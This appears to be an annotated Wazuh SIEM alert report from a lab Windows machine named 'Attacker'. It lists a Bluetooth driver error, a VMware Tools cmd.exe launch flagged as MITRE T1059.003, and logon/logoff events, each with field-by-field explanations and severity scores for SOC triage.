rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534985.2414193
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  BTHUSB
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  17
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:48:59.6557881Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  3055
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10108
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.binary:  000000000100000000000000110005C0000000000000000000000000000000000000000000000000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows command prompt started by an abnormal process

🧠 What happened? Windows command prompt started by an abnormal process

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:49:45.339+0000 | 🧠 MITRE: ['Execution'] – ['Windows Command Shell'] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:45.339+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows command prompt started by an abnormal process
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92052
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534985.2415577
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:48:59.7576790Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  344372
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:48:59.088 ProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} ProcessId: 3372 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} ParentProcessId: 3220 ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:48:59.088
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bfdb-680a-a50c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Command Processor
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  Cmd.Exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4800-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:45.917+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:45.917+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534985.2421197
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8658034Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43982
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x31B4686 Linked Logon ID: 0x31C1A7D Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x31b4686
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x31c1a7d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:45.948+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:45.948+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534985.2428919
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8658429Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43983
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: No Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x31C1A7D Linked Logon ID: 0x31B4686 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x31c1a7d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x31b4686
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:46.010+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:46.010+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534986.2436639
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8727048Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43985
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  17252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

